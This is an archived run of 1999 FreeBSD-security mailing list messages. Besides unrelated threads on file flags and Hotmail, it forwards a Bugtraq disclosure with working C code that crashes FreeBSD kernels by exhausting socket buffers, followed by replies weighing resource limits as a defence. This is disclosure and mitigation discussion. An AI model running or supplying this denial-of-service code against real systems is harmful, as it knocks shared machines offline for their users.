X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Bill Swingle
Cc: Laurence Berland, Liam Slusser, Kevin Lynn, Peter Kok, security@FreeBSD.ORG
Subject: Re: hotmail
References: <37CC9BC7.45CE961E@confusion.net> <19990831203022.A8558@dub.net>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Bill Swingle wrote:
>
> This is correct. Hotmail has ~1800 FreeBSD boxen as webservers and their
> database stuff is run on Sun boxen running Solaris.

And Oracle.  ;^)

--
       "Where am I, and what am I doing in this handbasket?"

Wes Peters                                                         Softweyr LLC
http://softweyr.com/                                           wes@softweyr.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Aug 31 23:41: 7 1999
Delivered-To: freebsd-security@freebsd.org
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 1787014C0C for ; Tue, 31 Aug 1999 23:41:02 -0700 (PDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id AAA10641; Wed, 1 Sep 1999 00:41:01 -0600 (MDT) (envelope-from imp@harmony.village.org)
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id AAA16059; Wed, 1 Sep 1999 00:40:41 -0600 (MDT) (envelope-from imp@harmony.village.org)
Message-Id: <199909010640.AAA16059@harmony.village.org>
To: Frank Tobin
Subject: Re: Not sure if you got it...
Cc: FreeBSD-security Mailing List
In-reply-to: Your message of "Tue, 31 Aug 1999 10:56:40 CDT."
References:
Date: Wed, 01 Sep 1999 00:40:41 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message Frank Tobin writes:
: 3) Use chflags -R , followed by rm -rf.  This two step
: process is consistent with unix philosophy.  This is probably the cleanest
: (traditionally) solution.  However, it causes two disk passes instead of
: one.

And might also have a race condition in it, since if someone adds a
flag after the chflags -R has gone over it, rm will not be able to
remove the file.

: 4) Use find(1) with -exec chflags and rm.  This has the downside of many
: processes getting started (one chflags and one rm for each node), and
: again, more disk usage (we don't all use SCSI yet).

5) find -delete should take all measures that it can to remove the file.

The whole file flags thing was a cool idea, but it is a PITA and
likely shouldn't have been implemented the way it was:-(

Warner

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Sep 1 0:18:42 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id A807C15459 for ; Wed, 1 Sep 1999 00:18:39 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net)
Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id AAA73783; Wed, 1 Sep 1999 00:17:56 -0700 (PDT) (envelope-from freebsd)
From: "Rodney W. Grimes"
Message-Id: <199909010717.AAA73783@gndrsh.dnsmgr.net>
Subject: Re: Not sure if you got it...
In-Reply-To: <199909010640.AAA16059@harmony.village.org> from Warner Losh at "Sep 1, 1999 00:40:41 am"
To: imp@village.org (Warner Losh)
Date: Wed, 1 Sep 1999 00:17:56 -0700 (PDT)
Cc: ftobin@uiuc.edu (Frank Tobin), freebsd-security@FreeBSD.ORG (FreeBSD-security Mailing List)
X-Mailer: ELM [version 2.4ME+ PL54 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> In message Frank Tobin writes:
> : 3) Use chflags -R , followed by rm -rf.  This two step
> : process is consistent with unix philosophy.  This is probably the cleanest
> : (traditionally) solution.  However, it causes two disk passes instead of
> : one.
>
> And might also have a race condition in it, since if someone adds a
> flag after the chflags -R has gone over it, rm will not be able to
> remove the file.

And just how would you implement rm -rF so that this window was eliminated?
It would be greatly narrowed, but it would be next to impossible to
eliminate unless you started to do mandatory locking on directories, or
implementing an additional system call that was ``unlink regardless of
flags'', or bent the current unlink/rmdir to take additional options.

In fact, how does rm -rf deal with someone possibly coming along with a
chmod 0 filename stuck in a nice tight loop???  rm is full of race
conditions, especially when run with -i :-).

Has anyone else seen the point I raise about creeeeeeping featurism, and
perhaps understand why I get so vocal about some of this stuff?
Implementations have to be very carefully planned, studied for problems,
tested for problems, and then looked at by ``devils advocates'' before
they can be considered real.

-R can never be made race safe until mandatory locking is implemented.

>
> : 4) Use find(1) with -exec chflags and rm.  This has the downside of many
> : processes getting started (one chflags and one rm for each node), and
> : again, more disk usage (we don't all use SCSI yet).
>
> 5) find -delete should take all measures that it can to remove the file.

I strongly disagree.  I didn't even know find had a -delete option; if I
want find to delete for me I pipe to xargs rm.

>
> The whole file flags thing was a cool idea, but it is a PITA and
> likely shouldn't have been implemented the way it was:-(

Can we have a knob to turn it off TOTALLY OFF, please please please.
Even if it's compile time.  It has become such a PITA it has created
security problems, probably more DOS problems than it ever solved.

--
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.dnsmgr.net

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Sep 1 7:18:38 1999
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 2E74614C24 for ; Wed, 1 Sep 1999 07:18:35 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id KAA05955; Wed, 1 Sep 1999 10:18:06 -0400 (EDT) (envelope-from wollman)
Date: Wed, 1 Sep 1999 10:18:06 -0400 (EDT)
From: Garrett Wollman
Message-Id: <199909011418.KAA05955@khavrinen.lcs.mit.edu>
To: Warner Losh
Cc: FreeBSD-security Mailing List
Subject: Re: Not sure if you got it...
In-Reply-To: <199909010640.AAA16059@harmony.village.org>
References: <199909010640.AAA16059@harmony.village.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

< said:

> The whole file flags thing was a cool idea, but it is a PITA and
> likely shouldn't have been implemented the way it was:-(

nodump is incredibly useful and clearly the right thing, at least for
those of us who must worry about FERPA.  (Not to mention subpoenas!)

-GAWollman

--
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA |                     - Susan Aglukark and Chad Irschick

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Sep 1 9:33:20 1999
Delivered-To: freebsd-security@freebsd.org
Received: from tad.cetlink.net (tad.cetlink.net [209.198.2.10]) by hub.freebsd.org (Postfix) with ESMTP id 892E114D07 for ; Wed, 1 Sep 1999 09:33:14 -0700 (PDT) (envelope-from jeff@tad.cetlink.net)
Received: (from jeff@localhost) by tad.cetlink.net (8.9.2/8.9.1) id MAA00386 for freebsd-security@freebsd.org; Wed, 1 Sep 1999 12:33:06 -0400 (EDT) (envelope-from jeff)
Message-ID:
X-Mailer: XFMail 1.3 [p0] on FreeBSD
X-Priority: 3 (Normal)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
Date: Wed, 01 Sep 1999 12:33:06 -0400 (EDT)
Organization: CETLink.Net
From: Jeff Wheat
To: freebsd-security@freebsd.org
Subject: FW: Local DoS in FreeBSD
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I have just verified that this code will indeed crash the following
systems:

Intel: 2.2.2, 2.2.6, 2.2.7, 2.2.8, 3.0, 3.1

Alpha: 4.0-19990809-SNAP

Regards,
Jeff

-----FW: -----

Date: Fri, 27 Aug 1999 00:43:47 -0400
Sender: Bugtraq List
From: "L. Sassaman"
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Local DoS in FreeBSD

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This was first posted to the FreeBSD security list on the 9th of August,
subsequently discussed on freebsd-stable and freebsd-hackers... no one
seems to care, even though it is able to lock up 2.2.6, 2.2.8, and 3.2.x
machines consistently. I have also been told that it affects NetBSD and
OpenBSD, though I haven't confirmed it.

Someone with the know-how care to fix?

L. Sassaman

System Administrator  |  "Even the most primitive society has
Technology Consultant |   an innate respect for the insane."
icq.. 10735603        |
pgp.. finger://ns.quickie.net/rabbi  |           --Mickey Rourke

- ---

#include <sys/types.h>
#include <sys/socket.h>         /* socketpair(2), setsockopt(2) */
#include <fcntl.h>              /* fcntl(2), O_NONBLOCK */
#include <unistd.h>             /* write(2) */

#define BUFFERSIZE 204800

extern int
main(void)
{
        int p[2], i;
        char crap[BUFFERSIZE];

        /* Loop until the kernel refuses to hand out another socket pair. */
        while (1)
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }

        return(0);
}

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v0.9.10 (GNU/Linux)
Comment: OpenPGP Encrypted Email Preferred.

iD8DBQE3xheKPYrxsgmsCmoRAiG+AJ9SbzLCXaYNkj/X7eg7uvljsSvATwCg+d91
TkVIqNdQpRi8CK9vySilouE=
=7ufs
-----END PGP SIGNATURE-----

--------------End of forwarded message-------------------------

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Sep 1 9:50:53 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 57BDE14DA5 for ; Wed, 1 Sep 1999 09:50:52 -0700 (PDT) (envelope-from hart@iserver.com)
Received: by gatekeeper.veriohosting.com; Wed, 1 Sep 1999 10:50:32 -0600 (MDT)
Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma009798; Wed, 1 Sep 99 10:50:15 -0600
Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id KAA22186; Wed, 1 Sep 1999 10:49:08 -0600 (MDT)
Date: Wed, 1 Sep 1999 10:49:08 -0600 (MDT)
From: Paul Hart
X-Sender: hart@anchovy.orem.iserver.com
Reply-To: Paul Hart
To: freebsd-security@freebsd.org
Subject: No patch yet for fts?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

It looks like we've got kernel patches now to prevent core dumps from
following symbolic links which is excellent, but has anyone looked at
committing OpenBSD's fts(3) patch?  See:

http://www.securityfocus.com/templates/archive.pike?list=1&date=1999-08-22&msg=199908271534.JAA27164@xerxes.cs.colorado.edu
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gen/fts.c?r1=1.18&r2=1.19

It looks like integrating that patch would allow us to put this entire fts
hole behind us for good.

Paul Hart

--
Paul Robert Hart        ><8> ><8> ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8> ><8> ><8>        http://www.iserver.com/

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Sep 1 10:46:44 1999
Delivered-To: freebsd-security@freebsd.org
Received: from free-bsd.org (edslppp4.dnvr.uswest.net [216.160.128.4]) by hub.freebsd.org (Postfix) with ESMTP id AB91014C18 for ; Wed, 1 Sep 1999 10:46:40 -0700 (PDT) (envelope-from geniusj@free-bsd.org)
Received: from localhost (geniusj@localhost) by free-bsd.org (8.9.3/8.9.3) with ESMTP id LAA18942; Wed, 1 Sep 1999 11:49:41 -0600 (MDT) (envelope-from geniusj@free-bsd.org)
Date: Wed, 1 Sep 1999 11:49:41 -0600 (MDT)
From: FreeBSD -- The Power to Serve
To: Jeff Wheat
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: FW: Local DoS in FreeBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

If you have public access users, you should have login accounting in the
first place.. and yes, it does stop it :).. I verified this on a 3.2 box
with my login accounting setup..

On Wed, 1 Sep 1999, Jeff Wheat wrote:

> I have just verified that this code will indeed crash the following
> systems:
>
> Intel: 2.2.2, 2.2.6, 2.2.7, 2.2.8, 3.0, 3.1
>
> Alpha: 4.0-19990809-SNAP
>
>
> Regards,
> Jeff
>
> -----FW: -----
>
> Date: Fri, 27 Aug 1999 00:43:47 -0400
> Sender: Bugtraq List
> From: "L. Sassaman"
> To: BUGTRAQ@SECURITYFOCUS.COM
> Subject: Local DoS in FreeBSD
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> This was first posted to the FreeBSD security list on the 9th of August,
> subsequently discussed on freebsd-stable and freebsd-hackers... no one
> seems to care, even though it is able to lock up 2.2.6, 2.2.8, and 3.2.x
> machines consistently. I have also been told that it affects NetBSD and
> OpenBSD, though I haven't confirmed it.
>
> Someone with the know-how care to fix?
>
>
>
> L. Sassaman
>
> System Administrator  |  "Even the most primitive society has
> Technology Consultant |   an innate respect for the insane."
> icq.. 10735603        |
> pgp.. finger://ns.quickie.net/rabbi  |           --Mickey Rourke
>
>
> - ---
>
>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <fcntl.h>
>
> #define BUFFERSIZE 204800
>
> extern int
> main(void)
> {
>         int p[2], i;
>         char crap[BUFFERSIZE];
>
>         while (1)
>         {
>                 if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
>                         break;
>                 i = BUFFERSIZE;
>                 setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
>                 setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
>                 setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
>                 setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
>                 fcntl(p[0], F_SETFL, O_NONBLOCK);
>                 fcntl(p[1], F_SETFL, O_NONBLOCK);
>                 write(p[0], crap, BUFFERSIZE);
>                 write(p[1], crap, BUFFERSIZE);
>         }
>
>         return(0);
> }
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v0.9.10 (GNU/Linux)
> Comment: OpenPGP Encrypted Email Preferred.
>
> iD8DBQE3xheKPYrxsgmsCmoRAiG+AJ9SbzLCXaYNkj/X7eg7uvljsSvATwCg+d91
> TkVIqNdQpRi8CK9vySilouE=
> =7ufs
> -----END PGP SIGNATURE-----
>
> --------------End of forwarded message-------------------------
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Sep 1 11: 6:53 1999
Delivered-To: freebsd-security@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id B38061517A for ; Wed, 1 Sep 1999 11:06:44 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id OAA07516; Wed, 1 Sep 1999 14:05:47 -0400 (EDT)
Message-Id: <3.0.5.32.19990901140428.01f197b0@staff.sentex.ca>
X-Sender: mdtpop@staff.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32)
Date: Wed, 01 Sep 1999 14:04:28 -0400
To: FreeBSD -- The Power to Serve
From: Mike Tancsa
Subject: Re: FW: Local DoS in FreeBSD
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To:
References:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote:
>If you have public access users, you should have login accounting in the
>first place.. and yes, it does stop it :).. I verified this on a 3.2 box
>with my login accounting setup..

How does accounting stop it ?  Or do you mean it just discourages users
from doing it ?  How much overhead does accounting add to the system ?
Also, limiting the amount of file descriptors can prevent it, as the 'bug'
is essentially a resource starving issue (e.g. fork bomb)

        ---Mike
------------------------------------------------------------------------
Mike Tancsa,                                      tel 01.519.651.3400
Network Administrator,                            mike@sentex.net
Sentex Communications                             www.sentex.net
Cambridge, Ontario Canada

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Sep 1 13: 9:14 1999
Delivered-To: freebsd-security@freebsd.org
Received: from free-bsd.org (edslppp4.dnvr.uswest.net [216.160.128.4]) by hub.freebsd.org (Postfix) with ESMTP id 2288914BCF for ; Wed, 1 Sep 1999 13:09:05 -0700 (PDT) (envelope-from geniusj@free-bsd.org)
Received: from localhost (geniusj@localhost) by free-bsd.org (8.9.3/8.9.3) with ESMTP id OAA19277; Wed, 1 Sep 1999 14:10:32 -0600 (MDT) (envelope-from geniusj@free-bsd.org)
Date: Wed, 1 Sep 1999 14:10:32 -0600 (MDT)
From: FreeBSD -- The Power to Serve
To: Mike Tancsa
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: FW: Local DoS in FreeBSD
In-Reply-To: <3.0.5.32.19990901140428.01f197b0@staff.sentex.ca>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Exactly what I mean!  Limit file descriptors, and it also uses a lot of CPU
time so you can limit that too..  It will never crash the system with the
proper limits set :).  They can run it all they want.

On Wed, 1 Sep 1999, Mike Tancsa wrote:

> At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote:
> >If you have public access users, you should have login accounting in the
> >first place.. and yes, it does stop it :).. I verified this on a 3.2 box
> >with my login accounting setup..
>
> How does accounting stop it ?  Or do you mean it just discourages users
> from doing it ?  How much overhead does accounting add to the system ?
> Also, limiting the amount of file descriptors can prevent it, as the 'bug'
> is essentially a resource starving issue (e.g. fork bomb)
>
>         ---Mike
> ------------------------------------------------------------------------
> Mike Tancsa,                                      tel 01.519.651.3400
> Network Administrator,                            mike@sentex.net
> Sentex Communications                             www.sentex.net
> Cambridge, Ontario Canada
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Sep 1 13:22:21 1999
Delivered-To: freebsd-security@freebsd.org
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id BA25C14BCF for ; Wed, 1 Sep 1999 13:22:18 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id QAA18232; Wed, 1 Sep 1999 16:22:11 -0400 (EDT)
Message-Id: <3.0.5.32.19990901162052.023c18d0@staff.sentex.ca>
X-Sender: mdtpop@staff.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32)
Date: Wed, 01 Sep 1999 16:20:52 -0400
To: FreeBSD -- The Power to Serve
From: Mike Tancsa
Subject: Re: FW: Local DoS in FreeBSD
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To:
References: <3.0.5.32.19990901140428.01f197b0@staff.sentex.ca>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 02:10 PM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote:
>Exactly what I mean!  Limit file descriptors, and it also uses a lot of CPU
>time so you can limit that too..  It will never crash the system with the
>proper limits set :).  They can run it all they want.

Well, that sort of helps for kids just doing ./a.out, but would you put
accounting limits on your web server ?  That seems like a nasty can of
configuration worms one would be opening no ?

        ---Mike

>
>On Wed, 1 Sep 1999, Mike Tancsa wrote:
>
>> At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote:
>> >If you have public access users, you should have login accounting in the
>> >first place.. and yes, it does stop it :).. I verified this on a 3.2 box
>> >with my login accounting setup..
>>
>> How does accounting stop it ?  Or do you mean it just discourages users
>> from doing it ?  How much overhead does accounting add to the system ?
>> Also, limiting the amount of file descriptors can prevent it, as the 'bug'
>> is essentially a resource starving issue (e.g. fork bomb)
>>
>>         ---Mike
>> ------------------------------------------------------------------------
>> Mike Tancsa,                                      tel 01.519.651.3400
>> Network Administrator,                            mike@sentex.net
>> Sentex Communications                             www.sentex.net
>> Cambridge, Ontario Canada
>>
>>
>> To Unsubscribe: send mail to majordomo@FreeBSD.org
>> with "unsubscribe freebsd-security" in the body of the message
>>
>
>
>
------------------------------------------------------------------------
Mike Tancsa,                                      tel 01.519.651.3400
Network Administrator,                            mike@sentex.net
Sentex Communications                             www.sentex.net
Cambridge, Ontario Canada

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Sep 1 13:38: 7 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ns.skylink.it (ns.skylink.it [194.177.113.1]) by hub.freebsd.org (Postfix) with ESMTP id 4DCEC15542 for ; Wed, 1 Sep 1999 13:37:53 -0700 (PDT) (envelope-from hibma@skylink.it)
Received: from heidi.plazza.it (va-139.skylink.it [194.185.55.139]) by ns.skylink.it (8.9.1/8.8.8) with ESMTP id WAA24245; Wed, 1 Sep 1999 22:38:12 +0200
Received: from localhost (localhost [127.0.0.1]) by heidi.plazza.it (8.9.3/8.8.5) with ESMTP id UAA09006; Wed, 1 Sep 1999 20:19:40 GMT
X-No-Spam: Neither the receipients nor the senders email address(s) are to be used for Unsolicited (Commercial) Email without the explicit written consent of either party; as a per-message fee is incurred for inbound and outbound traffic to the originator.
Posted-Date: Wed, 1 Sep 1999 20:19:40 GMT
Date: Wed, 1 Sep 1999 22:19:40 +0200 (CEST)
From: Nick Hibma
X-Sender: n_hibma@heidi.plazza.it
Reply-To: Nick Hibma
To: FreeBSD -- The Power to Serve
Cc: Mike Tancsa, freebsd-security@FreeBSD.ORG
Subject: Re: FW: Local DoS in FreeBSD
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

That's one of the comments Microsoft makes when a security hole is
discovered, switch off that, increase the security level here.  It always
makes me kind of mad, because that's not what the Joe Average does or
considers something he should do until it's too late.

One of the features I like about Unix is for example free space available
solely to the root user.  It could be imagined that these things also
apply to file handles, memory/swap space and other scarce resources.

Nick

> Exactly what I mean!  Limit file descriptors, and it also uses a lot of CPU
> time so you can limit that too..  It will never crash the system with the
> proper limits set :).  They can run it all they want.
>
>
> On Wed, 1 Sep 1999, Mike Tancsa wrote:
>
> > At 11:49 AM 9/1/99 -0600, FreeBSD -- The Power to Serve wrote:
> > >If you have public access users, you should have login accounting in the
> > >first place.. and yes, it does stop it :).. I verified this on a 3.2 box
> > >with my login accounting setup..
> >
> > How does accounting stop it ?  Or do you mean it just discourages users
> > from doing it ?  How much overhead does accounting add to the system ?
> > Also, limiting the amount of file descriptors can prevent it, as the 'bug'
> > is essentially a resource starving issue (e.g. fork bomb)
> >
> >         ---Mike
> > ------------------------------------------------------------------------
> > Mike Tancsa,                                      tel 01.519.651.3400
> > Network Administrator,                            mike@sentex.net
> > Sentex Communications                             www.sentex.net
> > Cambridge, Ontario Canada
> >
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-security" in the body of the message
> >
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

--
e-Mail: hibma@skylink.it

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Sep 1 13:48:43 1999
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 2611915529 for ; Wed, 1 Sep 1999 13:48:40 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id QAA07324; Wed, 1 Sep 1999 16:46:08 -0400 (EDT) (envelope-from wollman)
Date: Wed, 1 Sep 1999 16:46:08 -0400 (EDT)
From: Garrett Wollman
Message-Id: <199909012046.QAA07324@khavrinen.lcs.mit.edu>
To: Nick Hibma
Cc: FreeBSD -- The Power to Serve, Mike Tancsa, freebsd-security@FreeBSD.ORG
Subject: Re: FW: Local DoS in FreeBSD
In-Reply-To:
References:
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

< said:

> One of the features I like about Unix is for example free space
> available solely to the root user. It could be imagined that these
> things also apply to file handles, memory/swap space and other scarce
> resources.

We have known for some time that the problem originally described exists, but developing an acceptable solution has been a challenge. Now that sockets carry around user credentials, it may perhaps not be as difficult as it used to be.

What needs to be done is to impose a per-UID resource limit on the amount of socket buffer space available.

What's not clear is:

1) At what level do you impose this limit?

2) Should the limit be statistical or exact?

3) What is a sensible default value?

-GAWollman

--
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA | - Susan Aglukark and Chad Irschick

From owner-freebsd-security Wed Sep 1 14:09:19 1999
Delivered-To: freebsd-security@freebsd.org
Received: from thetis.deor.org (thetis.quickie.net [206.245.163.5]) by hub.freebsd.org (Postfix) with ESMTP id 4347215A83 for ; Wed, 1 Sep 1999 14:09:04 -0700 (PDT) (envelope-from rabbi@quickie.net)
Received: from localhost (rabbi@localhost) by thetis.deor.org (8.9.3/8.9.3) with ESMTP id RAA13738; Wed, 1 Sep 1999 17:08:28 -0400
Date: Wed, 1 Sep 1999 17:08:22 -0400 (EDT)
From: "L. Sassaman"
To: FreeBSD -- The Power to Serve
Cc: Jeff Wheat, freebsd-security@FreeBSD.ORG
Subject: Re: FW: Local DoS in FreeBSD
In-Reply-To:
Message-ID:
X-AIM: Elom777
X-icq: 10735603
X-No-Archive: yes
X-PGP:
X-PGP-ID-Fprnt: 0x09AC0A6A 7A1A 407F B1CA 7E4E AE85 E730 3D8A F1B2 09AC 0A6A
X-PGP-S:
X-PGP-ID-Fprnt-S: 0x3AF92BD0 566B 5CA8 A733 34AA A482 586F 38D9 DBA8 3AF9 2BD0
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Wed, 1 Sep 1999, FreeBSD -- The Power to Serve wrote:

> If you have public access users, you should have login accounting in the
> first place.. and yes, it does stop it :).. I verified this on a 3.2 box
> with my login accounting setup..

Okay, tweak the login.conf and you stop users from issuing the attack from the shell. But what about someone who builds the program and uploads it into a cgi-bin? Are we just to stop allowing CGIs to be run if they require higher resource limits?

L. Sassaman

System Administrator                | "Even the most primitive society has
Technology Consultant               | an innate respect for the insane."
icq.. 10735603                      |
pgp.. finger://ns.quickie.net/rabbi | --Mickey Rourke

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v0.9.10 (GNU/Linux)
Comment: OpenPGP Encrypted Email Preferred.

iD8DBQE3zZXMPYrxsgmsCmoRAixFAKD5invyFWxll26tuJxuJ2u7UlNjNQCgiu1b
EnM3D/O25Wl+26pXVuRYpWM=
=Qeqw
-----END PGP SIGNATURE-----

From owner-freebsd-security Wed Sep 1 15:01:08 1999
Delivered-To: freebsd-security@freebsd.org
Received: from free-bsd.org (edslppp4.dnvr.uswest.net [216.160.128.4]) by hub.freebsd.org (Postfix) with ESMTP id 722F114D9D for ; Wed, 1 Sep 1999 15:01:04 -0700 (PDT) (envelope-from geniusj@free-bsd.org)
Received: from localhost (geniusj@localhost) by free-bsd.org (8.9.3/8.9.3) with ESMTP id QAA01966; Wed, 1 Sep 1999 16:04:06 -0600 (MDT) (envelope-from geniusj@free-bsd.org)
Date: Wed, 1 Sep 1999 16:04:06 -0600 (MDT)
